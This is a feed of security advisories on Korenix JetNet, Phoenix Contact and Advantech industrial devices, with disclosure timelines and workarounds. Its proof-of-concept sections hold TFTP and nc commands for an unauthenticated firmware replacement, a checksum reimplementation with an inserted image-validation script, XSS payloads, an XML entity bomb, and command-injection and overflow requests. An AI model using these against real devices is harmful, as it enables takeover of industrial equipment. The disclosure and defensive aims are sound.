Advisory – CyberDanube https://cyberdanube.com/en/
[EN] Multiple Vulnerabilities in Korenix JetNet Series https://cyberdanube.com/en/en-multiple-vulnerabilities-in-korenix-jetnet-series/ Tue, 09 Jan 2024 09:57:47 +0000 https://cyberdanube.com/en/?p=4505

Title: Multiple Vulnerabilities
Product: Korenix JetNet Series
Vulnerable version: See “Vulnerable versions”
Fixed version: –
CVE: CVE-2023-5376, CVE-2023-5347
Impact: High
Homepage: https://www.korenix.com/
Found: 2023-08-31


The Korenix JetNet series is prone to an unauthenticated firmware upgrade, which leads to remote code execution.

Vendor description

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […]. Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]”

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

Tested on emulated Korenix JetNet 5310G / v2.6

All vulnerable models/versions according to vendor:
JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)
JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3, 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3, 4508f-sw V2.3)
JetNet 5620G-4C V1.1
JetNet 5612GP-4F V1.2
JetNet 5612G-4F V1.2
JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)
JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0, 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)
JetNet 6628XP-4F-US V1.1
JetNet 6628X-4F-EU V1.0
JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)
JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0, 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0, 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)
JetNet 6910G-M12 HVDC V1.0
JetNet 7310G-V2 2.0
JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0, 7628XP-4F-EU V1.1
JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0
JetNet 7714G-M12 HVDC V1.0

Vulnerability overview

1) TFTP Without Authentication (CVE-2023-5376)
The available TFTP service is accessible without user authentication. This allows a user to upload files to and download files from the restricted “/home” folder.

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
A critical security vulnerability has been identified that may allow an unauthenticated attacker to compromise the integrity of a device or cause a denial of service (DoS) condition. This vulnerability resides in the firmware upgrade process of the affected system.

Proof of Concept

1) TFTP Without Authentication (CVE-2023-5376)

The Linux tftp client was used to upload a firmware to the absolute path “/home/firmware.bin”:

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)

Unauthenticated attackers can exploit this by uploading malicious firmware via TFTP and initializing the upgrade process with a crafted UDP packet on port 5010.

We came to the conclusion that the firmware image consists of multiple sections. Our interpretation of these can be seen below:

class FirmwarePart:
    # name, start offset in the image, and length in bytes of one section
    def __init__(self, name, offset, size):
        self.name = name
        self.offset = offset
        self.size = size

firmware_parts = [
    FirmwarePart("uimage_header", 0x0, 0x40),
    FirmwarePart("uimage_kernel", 0x40, 0x3c54),
    FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),
    FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),
    FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),
]

The squashfs contains the rootfs. The metadata section includes a 4-byte checksum that needs to be updated when the image is repacked. During our analysis we observed that the checksum is calculated over all sections except metadata. To test this vulnerability we reimplemented the checksum calculation found at offset 0x9bdc in the binary “/bin/cmd-server2”:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

/* Reimplementation of the routine at offset 0x9bdc in /bin/cmd-server2:
 * add up every 32-bit word of the file in 4096-byte reads, then subtract
 * the words of the last non-empty read again. */
int32_t check_file(const char* arg1) {
    FILE* r0 = fopen(arg1, "rb");

    if (!r0) {
        return 0xffffffff;
    }

    int32_t filechecksum = 0;
    int32_t last_data_size = 0;
    int32_t file_size = 0;
    uint8_t data_buf[4096];
    int32_t data_len = 1;

    while (data_len > 0) {
        data_len = fread(data_buf, 1, sizeof(data_buf), r0);

        if (data_len == 0) {
            break;
        }

        /* sum the whole words of this read; a trailing partial word is ignored */
        int32_t counter = 0;
        while (counter < (data_len >> 2)) {
            int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));
            counter++;
            filechecksum += byte_at_counter;
        }

        file_size += data_len;
        last_data_size = data_len;
    }

    fclose(r0);

    /* reject a final read shorter than 0x400 bytes, or a file whose size
     * minus 0x14a000 exceeds 0x5ac000 */
    if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a000) > 0x5ac000)) {
        return 0xffffffff;
    }

    /* data_buf still holds the last read: remove its words from the sum */
    data_len = 0;
    while (data_len < (last_data_size >> 2)) {
        int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));
        data_len++;
        filechecksum -= r3_2;
    }

    return filechecksum;
}

int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: %s <file_path>\n", argv[0]);
        return 1;
    }

    int32_t result = check_file(argv[1]);
    printf("0x%x\n", result);

    return 0;
}

After modifying and repacking the squashfs, we calculated the checksum, patched the required bytes in the metadata section (offset 0x11b-0x11e) and initiated the update process.
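The following Python script is an added example, not part of the advisory and not the vendor's code. It applies the section table and the checksum algorithm described above to a firmware image: it splits the image into the named sections, ports the chunked calculation from check_file() and shows that, with this layout, the result equals the word sum of every section except the final 4096-byte metadata block, which is exactly why the metadata can carry the checksum without influencing it. The little-endian reading of the words and of the checksum field at metadata offset 0x11b is an assumption, and the sample image is constructed with random section bodies rather than taken from a real Korenix file.

```python
import random
import struct

# Section table as interpreted in the advisory: (name, start offset, length).
FIRMWARE_PARTS = [
    ("uimage_header", 0x0, 0x40),
    ("uimage_kernel", 0x40, 0x3c54),
    ("gzip", 0x3c94, 0x14a000 - 0x3c94),
    ("squashfs", 0x14a000, 0x539000 - 0x14a000),
    ("metadata", 0x539000, 5480448 - 0x539000),
]
IMAGE_SIZE = 5480448
CHUNK = 4096            # fread() buffer size used by check_file()
CHECKSUM_FIELD = 0x11b  # offset of the 4-byte checksum inside the metadata section
MASK = 0xFFFFFFFF


def word_sum(buf: bytes, endian: str = "<") -> int:
    """Sum of the 32-bit words in buf modulo 2**32; a trailing partial word is
    ignored, as in the C code. Little-endian words are an assumption."""
    n = len(buf) // 4
    return sum(struct.unpack(f"{endian}{n}I", buf[:n * 4])) & MASK


def split_sections(image: bytes, parts=FIRMWARE_PARTS) -> dict:
    """Slice the image into the named sections of the table."""
    sections = {}
    for name, offset, size in parts:
        if offset + size > len(image):
            raise ValueError(f"section {name} runs past the end of the image")
        sections[name] = image[offset:offset + size]
    return sections


def cmd_server_checksum(image: bytes, endian: str = "<") -> int:
    """Port of check_file(): add the words of every 4096-byte read, then
    subtract the words of the last non-empty read. Returns 0xffffffff on the
    same size conditions the binary rejects."""
    total, last = 0, b""
    for off in range(0, len(image), CHUNK):
        last = image[off:off + CHUNK]
        total = (total + word_sum(last, endian)) & MASK
    if len(last) < 0x400 or len(image) - 0x14a000 > 0x5ac000:
        return MASK
    return (total - word_sum(last, endian)) & MASK


def sections_checksum(image: bytes, endian: str = "<") -> int:
    """Word sum over every section except metadata. Equal to cmd_server_checksum()
    because the metadata section is exactly the final 4096-byte read."""
    secs = split_sections(image)
    return sum(word_sum(b, endian) for n, b in secs.items() if n != "metadata") & MASK


def stored_checksum(image: bytes, endian: str = "<") -> int:
    """Checksum field carried in the metadata section (inFileChecksum in the log)."""
    meta = split_sections(image)["metadata"]
    return struct.unpack(f"{endian}I", meta[CHECKSUM_FIELD:CHECKSUM_FIELD + 4])[0]


def verify_image(image: bytes, endian: str = "<") -> bool:
    """True when the recomputed checksum matches the stored field."""
    if len(image) != IMAGE_SIZE:
        return False
    return cmd_server_checksum(image, endian) == stored_checksum(image, endian)


def build_test_image(seed: int = 1) -> bytes:
    """Constructed image with the advisory's layout: random section bodies plus
    a metadata block whose checksum field matches. Not a real Korenix file."""
    rng = random.Random(seed)
    body = rng.randbytes(0x539000)
    meta = bytearray(rng.randbytes(IMAGE_SIZE - 0x539000))
    csum = cmd_server_checksum(body + bytes(meta))  # metadata does not influence it
    meta[CHECKSUM_FIELD:CHECKSUM_FIELD + 4] = struct.pack("<I", csum)
    return body + bytes(meta)


if __name__ == "__main__":
    img = build_test_image()
    for name, data in split_sections(img).items():
        print(f"{name:14s} {len(data):8d} bytes")
    print(f"checksum={cmd_server_checksum(img):08x}, inFileChecksum={stored_checksum(img):08x}")
    print("image verifies:", verify_image(img))
```

Replacing build_test_image() with the bytes of a real image turns this into an inspection tool for the update path. The point for a defender is that an additive word sum detects transmission errors only: it does not distinguish a vendor image from a modified one, which is why the update channel itself (here the TFTP daemon and the UDP command port) must not be reachable by unauthenticated hosts.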

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

# echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010

The output of the serial console can be observed below:

Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received
Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi
Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10
Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received
check firmware…
checksum=b2256313, inFileChecksum=b2256313
Firmware upgrading, don’t turn off the switch!
Begin erasing flash:
.
Write firmware.bin (5480448 Bytes) to flash:

Write finished…
Terminating child processes…
Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain
Jan 1 00:01:01 syslogd exiting
Firmware upgrade success!!
waiting for reboot command …….

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a proper patch is available (see “Workaround” section).

Workaround

Beijer representatives provided the following workaround for mitigating the vulnerabilities on devices of the JetNet series:

Login by terminal:

Switch# configure terminal

Switch(config)# service ipscan disable

Switch(config)# tftpd disable

Switch(config)# copy running-config startup-config

Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947

These commands deactivate the TFTP daemon on the device and thereby prevent unauthenticated actors from abusing the service.

Recommendation

Regardless of the current state of the vulnerability, CyberDanube recommends Korenix customers to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.


Contact Timeline

  • 31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 31-08-2023: Receiving contact information. Sent vulnerability information.
  • 26-09-2023: Asking about vulnerability status and receiving update release date.
  • 27-10-2023: Received update from contact regarding the firmware update.
  • 29-11-2023: Meeting with contact stating that it affects the whole series.
  • 31-11-2023: Meeting to discuss potential solutions.
  • 11-12-2023: Release delayed due to lack of workaround from manufacturer.
  • 21-12-2023: Manufacturer provides workaround. Release date confirmed.
  • 09-01-2024: Coordinated release of security advisory.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems, firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

[EN] St. Pölten UAS | Multiple Vulnerabilities in Phoenix Contact TC Cloud Client, TC Router & Cloud Client https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-phoenix-contact-tc-cloud-client-tc-router-cloud-client/ Tue, 08 Aug 2023 09:52:07 +0000 https://cyberdanube.com/en/?p=4402

Title: Multiple Vulnerabilities
Product: Phoenix Contact TC Cloud Client 1002-4G*, TC Router 3002T-4G, Cloud Client 1101T-TX/TX
Vulnerable version: <2.07.2, <2.07.2, <2.06.10
Fixed version: 2.07.2, 2.07.2, 2.06.10
CVE: CVE-2023-3526, CVE-2023-3569
Impact: Medium
Homepage: https://www.phoenixcontact.com/
Found: 2023-05-04
By: A. Resanovic, S. Stockinger, T. Etzenberger

Disclaimer: This vulnerability was discovered during research at St. Pölten UAS, supported and coordinated by CyberDanube.


Phoenix Contact TC Cloud Client, TC Router & Cloud Client are prone to a Stored Cross-Site Scripting (XSS) and a Billion Laughs attack.

Vendor description

At Phoenix Contact, our approach is innovative, sustainable, and based on partnership. This applies to how we deal with employees as well as with our customers. We are also conscious of our social and environmental responsibility and we act accordingly. With the vision of the All Electric Society, we also want to empower our customers to act more sustainably by enabling the comprehensive electrification, networking, and automation of all sectors of the economy and infrastructure with our products and solutions.

Source: https://www.phoenixcontact.com/en-us/ueber-uns

Vulnerable versions

TC Router 3002T-4G* / <2.0.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

Vulnerability overview

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggered in the license viewer of the device. This can be used to execute malicious code in the context of a user’s browser. Cookies may also be stolen this way.

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569
By abusing the configuration file upload functionality of the device, it is possible to slow down all other processes.

Proof of Concept

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526

The reflected cross-site scripting vulnerability can be triggered by using the following GET request:

https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script>

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569

The following configuration file can be used to exploit the binary “/usr/bin/xmlconfig”, which supports entity reference nodes:
===============================================================================
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
===============================================================================
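As an added example that is not from the advisory or the vendor, the following Python code shows the parser-side mitigation for this class of input: an expat-based configuration reader that aborts as soon as a DOCTYPE or an entity declaration appears, so the entity references above are never expanded. The billion_laughs() helper rebuilds the document above purely as test input, and the benign configuration is constructed.

```python
import xml.parsers.expat


class UnsafeDocument(Exception):
    """Raised for documents that declare a DTD or entities."""


def parse_config_safely(xml_text: str) -> dict:
    """Parse a configuration document with expat, but refuse any DOCTYPE or
    entity declaration before a reference can be expanded.
    Returns {element name: character data} as a small demonstration result."""
    parser = xml.parsers.expat.ParserCreate()
    result, stack = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeDocument(f"DOCTYPE {name!r} not allowed in configuration files")

    def on_entity(*_):
        raise UnsafeDocument("entity declarations not allowed")

    def on_start(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def on_end(name):
        stack.pop()

    def on_text(data):
        if stack:
            result[stack[-1]] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(xml_text, True)  # raises UnsafeDocument or ExpatError
    return result


def rejects(xml_text: str) -> bool:
    """True when the parser refuses the document."""
    try:
        parse_config_safely(xml_text)
    except UnsafeDocument:
        return True
    return False


def billion_laughs(depth: int = 9, fanout: int = 10) -> str:
    """Rebuilds the document from the advisory: each entity references the
    previous one `fanout` times, so &lol9; would expand to 10**9 copies."""
    decls = ['<!ENTITY lol "lol">', "<!ELEMENT lolz (#PCDATA)>"]
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f"\n]>\n<lolz>&lol{depth};</lolz>")


# Constructed benign configuration, the kind of input the parser should accept.
BENIGN_CONFIG = '<?xml version="1.0"?><config><host>10.0.0.1</host><port>443</port></config>'

if __name__ == "__main__":
    print(parse_config_safely(BENIGN_CONFIG))
    print("bomb rejected:", rejects(billion_laughs()))
```

The same policy carries over to any other parser used for uploaded configuration: disable DTD processing and entity substitution, and reject a DOCTYPE in untrusted input before it reaches the parser rather than relying on expansion limits after the fact.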

Approach

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update to the latest available firmware version.

Workaround

None.

Recommendation

CyberDanube recommends Phoenix Contact customers to upgrade the firmware to the latest version available.


Contact Timeline

  • 2023-05-16: Contacting vendor via psirt@phoenixcontact.com
  • 2023-05-17: Vendor informed internal product team.
  • 2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
  • 2023-05-19: Vendor needs more time to fix the issues.
  • 2023-06-15: Vendor asked for an explanation of the issues as he cannot reproduce them; Sent screenshots and more PoCs to the vendor.
    Offered an MS Teams call to clarify the issues.
  • 2023-06-16: Scheduled a call for 2023-06-19.
  • 2023-06-19: Clarified issues and further timeline for the coordination. Vendor proposed to release the firmware on 2023-07-13.
  • 2023-07-04: Contact stated that he has to shift the release after July. It will be released on 08.08.2023; Confirmed the date.
  • 2023-07-13: Received CVE numbers from vendor.
  • 2023-07-18: Received firmware versions from vendor.
  • 2023-07-23: Vendor released firmwares.
  • 2023-08-08: Coordinated release of security advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

[EN] St. Pölten UAS | Multiple Vulnerabilities in Advantech EKI-15XX Series https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/ Tue, 08 Aug 2023 09:51:34 +0000 https://cyberdanube.com/en/?p=4397

Title: Multiple Vulnerabilities
Product: Advantech EKI-1524-CE series, EKI-1522 series, EKI-1521 series
Vulnerable version: <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203)
Fixed version: 1.26
CVE: CVE-2023-4202, CVE-2023-4203
Impact: Medium
Homepage: https://advantech.com
Found: 2023-05-04
By: R. Haas, A. Resanovic, T. Etzenberger, M. Bineder

Disclaimer: This vulnerability was discovered during research at St. Pölten UAS, supported and coordinated by CyberDanube.


Advantech EKI-1524/1522/1521 devices are prone to multiple Stored Cross-Site Scripting (XSS) vulnerabilities.

Vendor description

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21 (CVE-2023-4202)
EKI-1522-CE series / 1.21 (CVE-2023-4202)
EKI-1521-CE series / 1.21 (CVE-2023-4202)
EKI-1524-CE series / 1.24 (CVE-2023-4203)
EKI-1522-CE series / 1.24 (CVE-2023-4203)
EKI-1521-CE series / 1.24 (CVE-2023-4203)

Vulnerability overview

1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)
Two stored cross-site scripting vulnerabilities have been identified in the firmware of the device. The first XSS was identified in the “Device Name” field and the second XSS was found in the “Ping” tool. This can be exploited in the context of a victim’s session.

Proof of Concept

1) Stored Cross-Site Scripting (XSS)

Both cross-site scripting vulnerabilities are permanently affecting the device.

1.1) Stored XSS in Device Name CVE-2023-4202

The first vulnerability can be triggered by setting the device name (“System->Device Name”) to the following value:

"><script>alert("document.cookie")</script>

This code prints out the cached cookies to the screen.

1.2) Stored XSS in Ping Function CVE-2023-4203

The second XSS vulnerability can be found in “Tools->Ping”. The following GET request prints the current cached cookies of a user’s session to the screen.

http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513

An alternative to the used payload is using “onmouseover” event tags. In this case it prints out the number “1337”: " onmousemove="alert(1337)

Approach

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Upgrade to the newest available firmware.

Workaround

None.

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.


Contact Timeline

  • 2023-05-16: Contacting vendor via security contact.
  • 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21.
    The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue.
  • 2023-05-25: Contact stated that new firmware should resolve the issue.
  • 2023-06-03: Sent new payload to the vendor.
  • 2023-06-05: Vendor asked for clarification; Sent further explanation to the contact; Vendor contact said he knows a solution.
  • 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues.
  • 2023-06-27: Asked for the release date.
  • 2023-07-04: Contact stated that they are currently doing QA tests.
  • 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published.
  • 2023-07-17: Assigned CVE numbers for the issues. Asked for an update.
  • 2023-07-18: Vendor contact stated that the firmware will be released end of July.
  • 2023-08-07: Asked contact for the new firmware version.
  • 2023-08-08: Received version 1.26 as the official released firmware with fixes.
    Coordinated release of security advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

[EN] Multiple Vulnerabilities in Advantech EKI-15XX Series https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/ Wed, 10 May 2023 19:35:21 +0000 https://cyberdanube.com/en/?p=4383

Title: Multiple Vulnerabilities
Product: Advantech EKI-1524-CE series, EKI-1522 series, EKI-1521 series
Vulnerable version: 1.21
Fixed version: 1.24
CVE: CVE-2023-2573, CVE-2023-2574, CVE-2023-2575
Impact: High
Homepage: https://advantech.com
Found: 2023-03-06


Advantech EKI-1524/1522/1521 devices are prone to authenticated command injections and a buffer overflow vulnerability. These vulnerabilities can be used to execute arbitrary commands on OS level.

Vendor description

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21
EKI-1522-CE series / 1.21
EKI-1521-CE series / 1.21

Vulnerability overview

1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)
The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks on the device by malicious actors.

2) Buffer Overflow (CVE-2023-2575)
The web server is prone to a buffer overflow, triggered due to missing input length validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.

Proof of Concept

1) Authenticated Command Injection

The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands into the system, which get executed with root permissions in the background.

1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)

The following POST request executes the command ";ping 10.0.0.1" on the system:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

It is also possible to execute this command via the web interface without an interceptor proxy by enclosing it in “;”, which results in the string “;ping 10.0.0.1;”.

1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)

The device name can also be abused for command injection. It is only executed on reboot, but a reboot can also be triggered via the device’s web interface. A POST request which injects the command “;ls /etc;” looks like the following:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

Such a command can also be injected by setting the device name to “;ls /etc;” in the web interface.

2) Buffer Overflow (CVE-2023-2575)

The following POST request can be used to trigger a buffer overflow vulnerability in the web server:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 823
Origin: http://172.16.0.97
Connection: close
Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaa […] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa […]
&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

The serial port of the device provides error messages, which already indicate that the stack has been corrupted:

/ # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 ***
*** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 ***

Furthermore, the forked child processes seem to remain in the process list as zombies – three buffer overflows were triggered in this case:

/ # ps
PID USER COMMAND
[…]
935 root ./index.cgi func=setsys
959 root ./index.cgi func=setsys
983 root ./index.cgi func=setsys
[…]
